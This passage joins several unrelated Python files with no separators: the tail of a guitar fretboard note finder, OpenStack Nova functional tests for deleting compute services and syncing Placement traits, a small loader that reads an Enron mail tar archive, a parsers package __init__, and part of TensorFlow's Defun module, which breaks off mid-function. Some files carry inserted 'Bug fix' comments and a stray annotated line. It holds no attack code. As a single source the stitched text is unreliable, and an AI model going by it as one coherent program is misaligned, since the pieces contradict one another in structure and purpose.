                found_position.append(string + "0")
            elif string == upper_seek_note:
                color = Fore.WHITE + Back.CYAN
                upper_found_position.append(string + "0")
            elif string == lower_seek_note:
                color = Fore.WHITE + Back.MAGENTA
                lower_found_position.append(string + "0")

            print(color +
                  (' ' * (self.max_string_name_len - len(string))) +
                  string, end='')

            print(Fore.YELLOW + '||', end='')

            fret_nr = 1

            for note in self.strings[string]:
                color = Fore.WHITE + Back.BLACK
                if note == seek_note:
                    color = Fore.WHITE + Back.RED
                    found_position.append(string + str(fret_nr))
                elif note == upper_seek_note:
                    color = Fore.WHITE + Back.CYAN
                    upper_found_position.append(string + str(fret_nr))
                elif note == lower_seek_note:
                    color = Fore.WHITE + Back.MAGENTA
                    lower_found_position.append(string + str(fret_nr))

                # 4-char cell, padded with '-' for short note names.
                print(color +
                      note[0:4] +
                      '-' * (4 - len(note)), end='')
                print(Fore.YELLOW + Back.BLACK + '|', end='')

                fret_nr += 1

            print(Fore.WHITE + Back.BLACK + '')

        print(Fore.WHITE + '\n')

        print(Back.CYAN + ' ' + Back.BLACK +
              ' Found octave-higher note {} on: {}'.format(
                  upper_seek_note, upper_found_position))
        print(Back.RED + ' ' + Back.BLACK +
              ' Found note {} on: {}'.format(seek_note,
                                             found_position))
        print(Fore.WHITE +
              Back.MAGENTA + ' ' + Back.BLACK +
              ' Found octave-lower note {} on: {}'.format(
                  lower_seek_note, lower_found_position))

# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import os_resource_classes as orc
import os_traits
import six

from nova import context as nova_context
from nova import exception
from nova import objects
from nova.tests.functional.api import client as api_client
from nova.tests.functional import integrated_helpers
from nova import utils


class TestServicesAPI(integrated_helpers.ProviderUsageBaseTestCase):
    """Functional tests for deleting nova-compute services via the
    os-services API, verifying the related cleanup (or known lack
    thereof) in aggregates, host mappings and Placement.
    """
    # Fake virt driver: no real hypervisor needed for these tests.
    compute_driver = 'fake.SmallFakeDriver'

    def test_compute_service_delete_ensure_related_cleanup(self):
        """Tests deleting a compute service and the related cleanup associated
        with that like the compute_nodes table entry, removing the host
        from any aggregates, the host mapping in the API DB and the associated
        resource provider in Placement.
        """
        compute = self._start_compute('host1')
        # Make sure our compute host is represented as expected.
        services = self.admin_api.get_services(binary='nova-compute')
        self.assertEqual(1, len(services))
        service = services[0]

        # Now create a host aggregate and add our host to it.
        aggregate = self.admin_api.post_aggregate(
            {'aggregate': {'name': 'agg1'}})
        self.admin_api.add_host_to_aggregate(aggregate['id'], service['host'])
        # Make sure the host is in the aggregate.
        aggregate = self.admin_api.api_get(
            '/os-aggregates/%s' % aggregate['id']).body['aggregate']
        self.assertEqual([service['host']], aggregate['hosts'])

        rp_uuid = self._get_provider_uuid_by_host(service['host'])

        # We'll know there is a host mapping implicitly if os-hypervisors
        # returned something in _get_provider_uuid_by_host, but let's also
        # make sure the host mapping is there like we expect.
        ctxt = nova_context.get_admin_context()
        objects.HostMapping.get_by_host(ctxt, service['host'])

        # Make sure there is a resource provider for that compute node based
        # on the uuid.
        resp = self.placement_api.get('/resource_providers/%s' % rp_uuid)
        self.assertEqual(200, resp.status)

        # Make sure the resource provider has inventory.
        inventories = self._get_provider_inventory(rp_uuid)
        # Expect a minimal set of inventory for the fake virt driver.
        for resource_class in [orc.VCPU, orc.MEMORY_MB, orc.DISK_GB]:
            self.assertIn(resource_class, inventories)

        # Now create a server so that the resource provider has some allocation
        # records.
        flavor = self.api.get_flavors()[0]
        server = self._boot_and_check_allocations(flavor, service['host'])

        # Now the fun part, delete the compute service and make sure related
        # resources are cleaned up, like the compute node, host mapping, and
        # resource provider. We have to first stop the compute service so
        # it doesn't recreate the compute node during the
        # update_available_resource periodic task.
        self.admin_api.put_service(service['id'], {'forced_down': True})
        compute.stop()
        # The first attempt should fail since there is an instance on the
        # compute host.
        ex = self.assertRaises(api_client.OpenStackApiException,
                               self.admin_api.api_delete,
                               '/os-services/%s' % service['id'])
        self.assertIn('Unable to delete compute service that is hosting '
                      'instances.', six.text_type(ex))
        self.assertEqual(409, ex.response.status_code)

        # Now delete the instance and wait for it to be gone.
        self._delete_and_check_allocations(server)

        # Now we can delete the service.
        self.admin_api.api_delete('/os-services/%s' % service['id'])

        # Make sure the service is deleted.
        services = self.admin_api.get_services(binary='nova-compute')
        self.assertEqual(0, len(services))

        # Make sure the host was removed from the aggregate.
        aggregate = self.admin_api.api_get(
            '/os-aggregates/%s' % aggregate['id']).body['aggregate']
        self.assertEqual([], aggregate['hosts'])

        # Trying to get the hypervisor should result in a 404.
        self.admin_api.api_get(
            'os-hypervisors?hypervisor_hostname_pattern=%s' % service['host'],
            check_response_status=[404])

        # The host mapping should also be gone.
        self.assertRaises(exception.HostMappingNotFound,
                          objects.HostMapping.get_by_host,
                          ctxt, service['host'])

        # And finally, the resource provider should also be gone. The API
        # will perform a cascading delete of the resource provider inventory
        # and allocation information.
        resp = self.placement_api.get('/resource_providers/%s' % rp_uuid)
        self.assertEqual(404, resp.status)

    def test_evacuate_then_delete_compute_service(self):
        """Tests a scenario where a server is created on a host, the host
        goes down, the server is evacuated to another host, and then the
        source host compute service is deleted. After that the deleted
        compute service is restarted. Related placement resources are checked
        throughout.
        """
        # Create our source host that we will evacuate *from* later.
        host1 = self._start_compute('host1')
        # Create a server which will go on host1 since it is the only host.
        flavor = self.api.get_flavors()[0]
        server = self._boot_and_check_allocations(flavor, 'host1')
        # Get the compute service record for host1 so we can manage it.
        service = self.admin_api.get_services(
            binary='nova-compute', host='host1')[0]
        # Get the corresponding resource provider uuid for host1.
        rp_uuid = self._get_provider_uuid_by_host(service['host'])
        # Make sure there is a resource provider for that compute node based
        # on the uuid.
        resp = self.placement_api.get('/resource_providers/%s' % rp_uuid)
        self.assertEqual(200, resp.status)
        # Down the compute service for host1 so we can evacuate from it.
        self.admin_api.put_service(service['id'], {'forced_down': True})
        host1.stop()
        # Start another host and trigger the server evacuate to that host.
        self._start_compute('host2')
        self.admin_api.post_server_action(server['id'], {'evacuate': {}})
        # The host does not change until after the status is changed to ACTIVE
        # so wait for both parameters.
        self._wait_for_server_parameter(server, {
            'status': 'ACTIVE',
            'OS-EXT-SRV-ATTR:host': 'host2'})
        # Delete the compute service for host1 and check the related
        # placement resources for that host.
        self.admin_api.api_delete('/os-services/%s' % service['id'])
        # Make sure the service is gone.
        services = self.admin_api.get_services(
            binary='nova-compute', host='host1')
        self.assertEqual(0, len(services), services)
        # FIXME(mriedem): This is bug 1829479 where the compute service is
        # deleted but the resource provider is not because there are still
        # allocations against the provider from the evacuated server.
        resp = self.placement_api.get('/resource_providers/%s' % rp_uuid)
        self.assertEqual(200, resp.status)
        self.assertFlavorMatchesUsage(rp_uuid, flavor)
        # Try to restart the host1 compute service to create a new resource
        # provider.
        self.restart_compute_service(host1)
        # FIXME(mriedem): This is bug 1817833 where restarting the now-deleted
        # compute service attempts to create a new resource provider with a
        # new uuid but the same name which results in a conflict. The service
        # does not die, however, because _update_available_resource_for_node
        # catches and logs but does not re-raise the error.
        log_output = self.stdlog.logger.output
        self.assertIn('Error updating resources for node host1.', log_output)
        self.assertIn('Failed to create resource provider host1', log_output)

    def test_migrate_confirm_after_deleted_source_compute(self):
        """Tests a scenario where a server is cold migrated and while in
        VERIFY_RESIZE status the admin attempts to delete the source compute
        and then the user tries to confirm the resize.
        """
        # Start a compute service and create a server there.
        self._start_compute('host1')
        host1_rp_uuid = self._get_provider_uuid_by_host('host1')
        flavor = self.api.get_flavors()[0]
        server = self._boot_and_check_allocations(flavor, 'host1')
        # Start a second compute service so we can cold migrate there.
        self._start_compute('host2')
        host2_rp_uuid = self._get_provider_uuid_by_host('host2')
        # Cold migrate the server to host2.
        self._migrate_and_check_allocations(
            server, flavor, host1_rp_uuid, host2_rp_uuid)
        # Delete the source compute service.
        service = self.admin_api.get_services(
            binary='nova-compute', host='host1')[0]
        # We expect the delete request to fail with a 409 error because of the
        # instance in VERIFY_RESIZE status even though that instance is marked
        # as being on host2 now.
        ex = self.assertRaises(api_client.OpenStackApiException,
                               self.admin_api.api_delete,
                               '/os-services/%s' % service['id'])
        self.assertEqual(409, ex.response.status_code)
        self.assertIn('Unable to delete compute service that has in-progress '
                      'migrations', six.text_type(ex))
        self.assertIn('There are 1 in-progress migrations involving the host',
                      self.stdlog.logger.output)
        # The provider is still around because we did not delete the service.
        resp = self.placement_api.get('/resource_providers/%s' % host1_rp_uuid)
        self.assertEqual(200, resp.status)
        self.assertFlavorMatchesUsage(host1_rp_uuid, flavor)
        # Now try to confirm the migration.
        self._confirm_resize(server)
        # Delete the host1 service since the migration is confirmed and the
        # server is on host2.
        self.admin_api.api_delete('/os-services/%s' % service['id'])
        # The host1 resource provider should be gone.
        resp = self.placement_api.get('/resource_providers/%s' % host1_rp_uuid)
        self.assertEqual(404, resp.status)

    def test_resize_revert_after_deleted_source_compute(self):
        """Tests a scenario where a server is resized and while in
        VERIFY_RESIZE status the admin attempts to delete the source compute
        and then the user tries to revert the resize.
        """
        # Start a compute service and create a server there.
        self._start_compute('host1')
        host1_rp_uuid = self._get_provider_uuid_by_host('host1')
        flavors = self.api.get_flavors()
        flavor1 = flavors[0]
        flavor2 = flavors[1]
        server = self._boot_and_check_allocations(flavor1, 'host1')
        # Start a second compute service so we can resize there.
        self._start_compute('host2')
        host2_rp_uuid = self._get_provider_uuid_by_host('host2')
        # Resize the server to host2.
        self._resize_and_check_allocations(
            server, flavor1, flavor2, host1_rp_uuid, host2_rp_uuid)
        # Delete the source compute service.
        service = self.admin_api.get_services(
            binary='nova-compute', host='host1')[0]
        # We expect the delete request to fail with a 409 error because of the
        # instance in VERIFY_RESIZE status even though that instance is marked
        # as being on host2 now.
        ex = self.assertRaises(api_client.OpenStackApiException,
                               self.admin_api.api_delete,
                               '/os-services/%s' % service['id'])
        self.assertEqual(409, ex.response.status_code)
        self.assertIn('Unable to delete compute service that has in-progress '
                      'migrations', six.text_type(ex))
        self.assertIn('There are 1 in-progress migrations involving the host',
                      self.stdlog.logger.output)
        # The provider is still around because we did not delete the service.
        resp = self.placement_api.get('/resource_providers/%s' % host1_rp_uuid)
        self.assertEqual(200, resp.status)
        self.assertFlavorMatchesUsage(host1_rp_uuid, flavor1)
        # Now revert the resize.
        self._revert_resize(server)
        self.assertFlavorMatchesUsage(host1_rp_uuid, flavor1)
        zero_flavor = {'vcpus': 0, 'ram': 0, 'disk': 0, 'extra_specs': {}}
        self.assertFlavorMatchesUsage(host2_rp_uuid, zero_flavor)
        # Delete the host2 service since the migration is reverted and the
        # server is on host1 again.
        service2 = self.admin_api.get_services(
            binary='nova-compute', host='host2')[0]
        self.admin_api.api_delete('/os-services/%s' % service2['id'])
        # The host2 resource provider should be gone.
        resp = self.placement_api.get('/resource_providers/%s' % host2_rp_uuid)
        self.assertEqual(404, resp.status)

class ComputeStatusFilterTest(integrated_helpers.ProviderUsageBaseTestCase):
    """Tests the API, compute service and Placement interaction with the
    COMPUTE_STATUS_DISABLED trait when a compute service is enable/disabled.

    This version of the test uses the 2.latest microversion for testing the
    2.53+ behavior of the PUT /os-services/{service_id} API.
    """
    # Fake virt driver: no real hypervisor needed for these tests.
    compute_driver = 'fake.SmallFakeDriver'

    def _update_service(self, service, disabled, forced_down=None):
        """Update the service using the 2.53 request schema.

        :param service: dict representing the service resource in the API
        :param disabled: True if the service should be disabled, False if the
            service should be enabled
        :param forced_down: Optionally change the forced_down value.
        """
        # 2.53+ identifies the service by id and takes a 'status' string.
        status = 'disabled' if disabled else 'enabled'
        req = {'status': status}
        if forced_down is not None:
            req['forced_down'] = forced_down
        self.admin_api.put_service(service['id'], req)

    def test_compute_status_filter(self):
        """Tests the compute_status_filter placement request filter"""
        # Start a compute service so a compute node and resource provider is
        # created.
        compute = self._start_compute('host1')
        # Get the UUID of the resource provider that was created.
        rp_uuid = self._get_provider_uuid_by_host('host1')
        # Get the service from the compute API.
        services = self.admin_api.get_services(binary='nova-compute',
                                               host='host1')
        self.assertEqual(1, len(services))
        service = services[0]

        # At this point, the service should be enabled and the
        # COMPUTE_STATUS_DISABLED trait should not be set on the
        # resource provider in placement.
        self.assertEqual('enabled', service['status'])
        rp_traits = self._get_provider_traits(rp_uuid)
        trait = os_traits.COMPUTE_STATUS_DISABLED
        self.assertNotIn(trait, rp_traits)

        # Now disable the compute service via the API.
        self._update_service(service, disabled=True)

        # The update to placement should be synchronous so check the provider
        # traits and COMPUTE_STATUS_DISABLED should be set.
        rp_traits = self._get_provider_traits(rp_uuid)
        self.assertIn(trait, rp_traits)

        # Try creating a server which should fail because nothing is available.
        networks = [{'port': self.neutron.port_1['id']}]
        server_req = self._build_server(networks=networks)
        server = self.api.post_server({'server': server_req})
        server = self._wait_for_state_change(server, 'ERROR')
        # There should be a NoValidHost fault recorded.
        self.assertIn('fault', server)
        self.assertIn('No valid host', server['fault']['message'])

        # Now enable the service and the trait should be gone.
        self._update_service(service, disabled=False)
        rp_traits = self._get_provider_traits(rp_uuid)
        self.assertNotIn(trait, rp_traits)

        # Try creating another server and it should be OK.
        server = self.api.post_server({'server': server_req})
        self._wait_for_state_change(server, 'ACTIVE')

        # Stop, force-down and disable the service so the API cannot call
        # the compute service to sync the trait.
        compute.stop()
        self._update_service(service, disabled=True, forced_down=True)
        # The API should have logged a message about the service being down.
        self.assertIn('Compute service on host host1 is down. The '
                      'COMPUTE_STATUS_DISABLED trait will be synchronized '
                      'when the service is restarted.',
                      self.stdlog.logger.output)
        # The trait should not be on the provider even though the node is
        # disabled.
        rp_traits = self._get_provider_traits(rp_uuid)
        self.assertNotIn(trait, rp_traits)
        # Restart the compute service which should sync and set the trait on
        # the provider in placement.
        self.restart_compute_service(compute)
        rp_traits = self._get_provider_traits(rp_uuid)
        self.assertIn(trait, rp_traits)


class ComputeStatusFilterTest211(ComputeStatusFilterTest):
    """Extends ComputeStatusFilterTest and uses the 2.11 API for the
    legacy os-services disable/enable/force-down API behavior
    """
    microversion = '2.11'

    def _update_service(self, service, disabled, forced_down=None):
        """Update the service using the 2.11 request schema.

        :param service: dict representing the service resource in the API
        :param disabled: True if the service should be disabled, False if the
            service should be enabled
        :param forced_down: Optionally change the forced_down value.
        """
        # Prior to microversion 2.53 a service is identified by its
        # (host, binary) pair rather than a UUID.
        payload = {
            'host': service['host'],
            'binary': service['binary'],
        }
        # Apply forced_down before enable/disable: the API's enable/disable
        # behavior depends on the forced_down state.
        if forced_down is not None:
            payload['forced_down'] = forced_down
            self.admin_api.api_put('/os-services/force-down', payload)

        if disabled:
            self.admin_api.api_put('/os-services/disable', payload)
        else:
            self.admin_api.api_put('/os-services/enable', payload)

    def _get_provider_uuid_by_host(self, host):
        # The hypervisor UUID is only exposed starting at microversion 2.53,
        # so temporarily bump the client before delegating to the parent.
        with utils.temporary_mutation(self.admin_api, microversion='2.53'):
            return super(ComputeStatusFilterTest211,
                         self)._get_provider_uuid_by_host(host)
#!/usr/bin/env python
# SIM-CITY client
#
# Copyright 2015 Netherlands eScience Center <info@esciencecenter.nl>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import tarfile


class load_data:

    '''
    class to load txt data
    '''

    def __init__(self, filename):
        """Read every regular-file member of the tar archive at `filename`
        into ``self.data`` (a list of bytes objects)."""
        self.filename = filename
        tfile, members = self.get_archive_object_tar()
        try:
            self.read_files(tfile, members)
        finally:
            # Bug fix: the archive handle was previously never closed,
            # leaking the file descriptor for the lifetime of the object.
            tfile.close()

    def get_archive_object_tar(self):
        '''
        return tarfile object and its members
        '''
        tfile = tarfile.open(name=self.filename)
        members = tfile.getnames()
        return tfile, members

    def read_files(self, tfile, members):
        '''
        array with txt data from tarfile object
        '''
        # extractfile() returns None for non-file members (directories,
        # links); call it once per member instead of twice as before.
        handles = (tfile.extractfile(member) for member in members)
        self.data = [handle.read() for handle in handles if handle is not None]


def main():
    """Command-line entry point: load the Enron mail archive.

    NOTE(review): the archive path is hard-coded; presumably this is run
    from the directory containing the dataset — confirm with the caller.
    """
    # Bug fix: removed the `import pdb; pdb.set_trace()` debugging
    # leftover, which halted every run at an interactive prompt.
    load_data('enron_mail_clean.tar.gz')


if __name__ == "__main__":
    main()

# zhangyu  (stray text, likely an accidental paste — kept as a comment so it cannot break parsing)

from .fetch import FetchParser
from .json_ld import JsonLdParser
from .lom import LomParser
from .lrmi import LrmiParser
from .nsdl_dc import NsdlDcParser

__all__ = [
    'FetchParser',
    'JsonLdParser',
    'LomParser',
    'LrmiParser',
    'NsdlDcParser',
]

# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Python front-end supports for functions.

NOTE: functions are currently experimental and subject to change!
"""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import collections
import hashlib

from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import function_pb2
from tensorflow.python import pywrap_tensorflow as c_api
from tensorflow.python.eager import context
from tensorflow.python.framework import c_api_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import graph_to_function_def
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.util import compat
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect


class Defun(object):
  """Decorator used to define TensorFlow functions.

  Use this decorator to make a Python function usable directly as a TensorFlow
  function.

  The decorated function must add ops to the default graph and return zero or
  more `Tensor` objects.  Call the decorator with named arguments, one for each
  argument of the function to decorate, with the expected type of the argument
  as value.

  For example if the function to decorate accepts two `tf.float32` arguments
  named `x` and `y`, call the decorator with:

      @Defun(tf.float32, tf.float32)
      def foo(x, y):
        ...

  When you call the decorated function it will add `call` ops to the
  default graph and adds the definition of the function into the
  default graph. Because the addition of the function into the graph
  is deferred, the decorator can be used anywhere in the program.

  Any variables created inside of the function are hoisted into the outer graph.
  Note that the variables are created in the variable scope that was active
  during the first call to the function. Subsequent function calls will refer to
  the same set of variables.

  Definitions of functions in a graph are frozen as soon as the graph is used to
  create a session. However, new functions and new calls to existing functions
  may be added to the graph, with the new functions themselves becoming
  immediately frozen.

  Example, but also see the [How To on functions](link_needed).

  ```python
  # Defining the function.
  @tf.Defun(tf.float32, tf.float32)
  def MyFunc(x, y):
    return x + y, x - y

  # Building the graph.
  a = tf.constant([1.0])
  b = tf.constant([2.0])
  c, d = MyFunc(a, b, name='mycall')
  ```
  """

  def __init__(self, *input_types, **kwargs):
    """Create a `Defun` decorator.

    Args:
      *input_types: A list of `tf.DType`
      **kwargs: Optional keyword arguments, including
         func_name - (optional).  A python string, the name to use to
           declare this `Function` in the graph.

         grad_func - (optional).  A function implementing the gradient
           of the function-to-register.  This must be a
           `_DefinedFunction` object. The gradient
           function must satisfy the criterion defined in
           function.proto:GradientDef.

         python_grad_func - (optional).  A function implementing the
           gradient of the function python-side. This function must
           take the current op and the gradients w.r.t. its outputs,
           and return the gradients w.r.t. the inputs. That is it must
           implement the interface expected by `tf.RegisterGradient`).
           This will be called by tf.gradients to add the gradient ops
           to the graph. At most one of grad_func and python_grad_func
           can be specified.

         out_names = (optional). A list of strings, one per output
           tensor.

         shape_func - (optional). A function taking the op and returning a list
           of static shapes to set for the function's outputs.
    """
    self._input_types = input_types
    self._func_name = kwargs.pop("func_name", None)
    self._grad_func = kwargs.pop("grad_func", None)
    self._python_grad_func = kwargs.pop("python_grad_func", None)
    self._out_names = kwargs.pop("out_names", None)
    # Any remaining keyword arguments become attrs on the FunctionDef.
    self._extra_kwargs = kwargs

  def __call__(self, func):
    # Various sanity checks on the callable func.
    if not callable(func):
      raise ValueError("func %s must be callable" % func)

    # Func should not use kwargs and defaults.
    argspec = tf_inspect.getargspec(func)
    if argspec.keywords or argspec.defaults:
      raise ValueError("Functions with argument defaults or keyword "
                       "arguments are not supported.")

    # Computes how many arguments 'func' has.
    min_args = len(argspec.args)
    max_args = min_args
    if argspec.varargs:
      max_args = 1000000
    argnames = argspec.args
    if tf_inspect.ismethod(func):
      # 1st argument is the "class" type.
      min_args -= 1
      argnames = argnames[1:]

    if self._input_types:
      # If Defun is given a list of types for the inputs, the number
      # of input types should be compatible with 'func'.
      num = len(self._input_types)
      if num < min_args or num > max_args:
        # Bug fix: the previous message only described the "fewer than"
        # case even when there were too many specified input types.
        raise ValueError(
            "The number of specified input types (%d) is incompatible "
            "with the number of arguments the function accepts "
            "(between %d and %d)." % (num, min_args, max_args))
      return _DefinedFunction(
          func,
          argnames,
          self._input_types,
          self._func_name,
          self._grad_func,
          self._python_grad_func,
          out_names=self._out_names,
          **self._extra_kwargs)

    # 'func' expects no arguments and input types is an empty list.
    if min_args == 0 and max_args == 0:
      return _DefinedFunction(
          func, [], [],
          self._func_name,
          self._grad_func,
          self._python_grad_func,
          out_names=self._out_names,
          **self._extra_kwargs)

    # Input types are unknown. It's an overloaded function and hence
    # its definition needs to be deferred until it's called.
    return _OverloadedFunction(
        func,
        argnames,
        self._func_name,
        self._grad_func,
        self._python_grad_func,
        out_names=self._out_names,
        **self._extra_kwargs)


class _DefinedFunction(object):
  """_DefinedFunction encapsulates a function definition and its properties.

  Attributes:
    name: The function name.
    definition: The definition of this function. A FunctionDef proto.
    grad_func_name: If not None, the name of this function's gradient function.
    python_grad_func: A python callable implementing the gradient of
      the function python-side.
  """

  def __init__(self,
               func,
               argnames,
               input_types,
               func_name=None,
               grad_func=None,
               python_grad_func=None,
               out_names=None,
               shape_func=None,
               capture_by_value=False,
               **kwargs):
    """Creates _DefinedFunction.

    Args:
      func:  A python callable which constructs a tf function body.
      argnames: A list of strings for function argument names.
      input_types: The function's argument types. Can be a tuple, list of
        tf data types.
      func_name: The function name. Defaults to None, in which case it is
        derived from 'func'.
      grad_func: This function's gradient function, if not None. Defaults
        to None.
      python_grad_func: A python callable implementing the gradient of
        the function python-side.
      out_names: An optional list of strings for the function return value
        names.
      shape_func: An optional function mapping an op to a list of static
        output shapes.
      capture_by_value: Boolean (defaults to False). If True, captured values
        will be copied into the function body.
      **kwargs: The keyword arguments. **kwargs is passed to every call
        site of this function.

    Raises:
      ValueError: The function definition is invalid.

    """
    self._func = func
    self._input_types = input_types
    self._func_name = func_name
    self._grad_func = grad_func
    self._python_grad_func = python_grad_func
    self._out_names = out_names
    self._shape_func = shape_func
    self._capture_by_value = capture_by_value
    # Remaining kwargs are serialized as attrs on the FunctionDef
    # (see _parse_kwargs_as_attrs in _create_definition_if_needed_impl).
    self._extra_kwargs = kwargs
    # Constructed only when C API is disabled, lazily
    self._definition = None
    # Constructed only when C API is enabled, lazily
    self._c_func = None
    self._sub_functions = dict()  # Constructed with _definition or _c_func
    # pylint: disable=protected-access
    device_funcs = ops.get_default_graph()._device_functions_outer_to_inner
    # pylint: enable=protected-access

    # Get the innermost device if possible.
    self._caller_device = device_funcs[-1] if device_funcs else None

    # Cached OpDef for this function. When C API is enabled, this is
    # the only part of FunctionDef that we cache in Python. When C API
    # is disabled the whole _definition is available and this is simply
    # another reference to _definition.signature
    self._op_def = None

    assert isinstance(input_types, (list, tuple))
    self._arg_types = input_types
    # Fall back to positional names ("arg0", "arg1", ...) when fewer
    # argnames than input types were supplied.
    self._arg_names = [argnames[i] if i < len(argnames) else ("arg%d" % i)
                       for i in range(len(input_types))]

  @property
  def name(self):
    """Function name."""
    self._create_definition_if_needed()
    return self._func_name

  @property
  def definition(self):
    """Function definition proto."""
    self._create_definition_if_needed()
    if self._c_func:
      # With the C API enabled, the FunctionDef is rebuilt on demand by
      # round-tripping the C function through a serialized buffer.
      with c_api_util.tf_buffer() as buf:
        c_api.TF_FunctionToFunctionDef(self._c_func.func, buf)
        fdef = function_pb2.FunctionDef()
        proto_data = c_api.TF_GetBuffer(buf)
        fdef.ParseFromString(compat.as_bytes(proto_data))
      return fdef
    return self._definition

  @property
  def _signature(self):
    self._create_definition_if_needed()
    return self._op_def

  def set_grad_func(self, grad_func):
    """Specifies the gradient function of this function."""
    assert not self._grad_func
    assert isinstance(grad_func, _DefinedFunction)
    self._grad_func = grad_func

  @property
  def grad_func_name(self):
    """Its gradient function's name."""
    return self._grad_func.name if self._grad_func else None

  @property
  def python_grad_func(self):
    """Python gradient function callable."""
    return self._python_grad_func

  @property
  def declared_input_types(self):
    """Returns the list of data types of explicit declared inputs."""
    return self._input_types

  @property
  def captured_inputs(self):
    """Returns the list of implicitly captured inputs."""
    self._create_definition_if_needed()
    return self._extra_inputs

  @property
  def stateful_ops(self):
    """Returns the list of stateful ops in function definition.

    Returns:
      A list of (op.name, op.type) pairs.
    """
    self._create_definition_if_needed()
    return self._stateful_ops

  def _create_definition_if_needed(self):
    """Creates the function definition if it's not created yet."""
    # Function bodies are always traced in graph mode, even under eager.
    with context.graph_mode():
      self._create_definition_if_needed_impl()

  def _create_definition_if_needed_impl(self):
    """This is not what you want, see _create_definition_if_needed."""
    # Already built (either the Python proto or the C function) — no-op.
    if self._definition is not None or self._c_func is not None:
      return

    # Trace the Python callable into a temporary _FuncGraph.
    temp_graph = func_graph_from_py_func(
        self._func, self._arg_names, self._arg_types, self._func_name,
        self._capture_by_value, self._caller_device)

    self._extra_inputs = temp_graph.extra_inputs
    # pylint: disable=protected-access
    self._sub_functions = temp_graph._functions
    # pylint: enable=protected-access

    # Extra kwargs are treated as attrs on the function def.
    if self._func_name:
      base_func_name = self._func_name
    else:
      base_func_name = function_utils.get_func_name(self._func)
      if self._grad_func:
        base_func_name += ("_%s" % self._grad_func.name)
    kwargs_attr = _parse_kwargs_as_attrs(base_func_name, **self._extra_kwargs)

    if not temp_graph._c_graph:  # pylint: disable=protected-access
      # Build the FunctionDef
      self._definition = graph_to_function_def.graph_to_function_def(
          temp_graph,
          temp_graph.get_operations(),
          temp_graph.inputs,
          temp_graph.outputs,
          out_names=self._out_names)

      for k in kwargs_attr:
        self._definition.attr[k].CopyFrom(kwargs_attr[k])

      # Hash the definition and its dependencies.
      self._hash_str = self._create_hash_str(
          self._definition.signature.input_arg,
          self._definition.signature.output_arg, self._definition.node_def)

      # Finally, we decide the function name to use.  If not specified,
      # make up something which is almost certainly unique (but deterministic).
      if not self._func_name:
        self._func_name = "_".join([base_func_name, self._hash_str])
      self._definition.signature.name = self._func_name
      if self._func.__doc__:
        self._definition.signature.description = self._func.__doc__

      self._op_def = self._definition.signature
    else:  # C API is enabled
      output_names = ([compat.as_bytes(x) for x in self._out_names]
                      if self._out_names else [])
      description = self._func.__doc__ or None
      # pylint: disable=protected-access
      c_func = c_api.TF_GraphToFunction_wrapper(
          temp_graph._c_graph,
          base_func_name,
          self._func_name is None,  # append_hash_to_fn_name
          None,  # opers
          [t._as_tf_output() for t in temp_graph.inputs],
          [t._as_tf_output() for t in temp_graph.outputs],
          output_names,
          None,  # opts
          description)
      self._c_func = c_api_util.ScopedTFFunction(c_func)
      # pylint: enable=protected-access
      self._set_c_attrs(kwargs_attr)

      # Set cached fields: _op_def and _func_name (if not already set)
      self._op_def = self.definition.signature
      if self._func_name:
        assert self._func_name == self._op_def.name
      else:
        self._func_name = compat.as_str(self._op_def.name)

    self._stateful_ops = [(op.name, op.type)
                          for op in temp_graph.get_operations()
                          if op.op_def.is_stateful]

  def _set_c_attrs(self, attrs):
    """Sets `attrs` as attributes of self._c_func.

    Requires that self._c_func is not None.

    Args:
      attrs: a dictionary from attribute name to attribute proto value
    """
    for name, attr_value in attrs.items():
      serialized = attr_value.SerializeToString()
      # TODO(skyewm): this creates and deletes a new TF_Status for every attr.
      # It might be worth creating a convenient way to re-use the same status.
      c_api.TF_FunctionSetAttrValueProto(self._c_func.func, compat.as_str(name),
                                         serialized)

  def _create_hash_str(self, input_arg, output_arg, node_def):
    """Creates an 8-character string unique to this input.

    Args:
      input_arg: the input_arg field of an OpDef
                 (e.g. self._definition.signature.input_arg)
      output_arg: the output_arg field of an OpDef
                 (e.g. self._definition.signature.output_arg)
      node_def: the node_def field of a FunctionDef
                (e.g. self._definition.node_def)

    Returns:
      The unique string for this input
    """
    hasher = hashlib.sha1()

    # Length-prefixed hashing keeps the digest unambiguous across
    # differently-split inputs.
    def update_num(n):
      hasher.update(compat.as_bytes("%x" % n))

    def update_str(s):
      update_num(len(s))
      hasher.update(compat.as_bytes(s))

    def update_strs(slist):
      update_num(len(slist))
      for s in slist:
        update_str(s)

    for adef in input_arg:
      update_str(adef.SerializeToString())

    for adef in output_arg:
      update_str(adef.SerializeToString())

    # Sort nodes by name so the hash is independent of traversal order.
    for n in sorted(node_def, key=lambda n: n.name):
      update_str(n.name)
      update_str(n.op)
      update_strs(n.input)
      update_num(len(n.attr))
      # NOTE: protobuf map serialization does not guarantee ordering.
      for k in sorted(n.attr):
        update_str(k)
        update_str(n.attr[k].SerializeToString())

